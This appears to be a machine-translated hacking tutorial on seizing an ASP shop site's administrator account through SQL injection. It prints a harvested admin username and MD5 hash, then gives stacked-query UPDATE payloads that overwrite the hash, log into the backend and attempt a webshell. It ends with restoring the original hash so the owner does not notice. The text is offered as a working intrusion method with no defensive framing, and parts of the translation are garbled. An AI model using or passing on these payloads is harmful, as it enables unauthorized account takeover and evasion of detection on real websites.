Change administrator password through injection

Injection Point found: http://xxx.com/book.asp? Id = 1996
I have just used NB for testing. We can see that the table segment shop_admin exists.
However, the password is MD5 encrypted: [adminid]: 24 [admin]: zhuyaod [password]: d4716077c2ba075c
Let's try to cheat. It can be seen that deception is no effect.
What should we do? Do you want to run the password? How much time and memory is wasted?
Next I will introduce a new method: injection. The injection statement is as follows:
; Update shop_admin set password = new MD5 encrypted password where password = d4716077c2ba075c --
For example, if I need to change the password of zhuyaod to wmmhacker, we need to first obtain the twelve

Bit Password
Here, we can use the tool of mingkiddie to convert it. Wmmhacker-f8dc763194f29433
; Update shop_admin set password = f8dc763194f29433 where password = d4716077c2ba075c --
Let's test. If no error is returned, the page is successful.
Now we can re-guess the password in the shop_admin table.
[Adminid]: 24 [admin]: zhuyaod [password]: f8dc763194f29433
The comparison has changed. Now we can log on.
Come in. Haha. That's it. It is worth mentioning that we entered the background and tried to get WEBSHELL.
Next, don't forget to restore the administrator password. Otherwise, he will find a drop!
; Update shop_admin set password = d4716077c2ba075c where password = f8dc763194f29433 --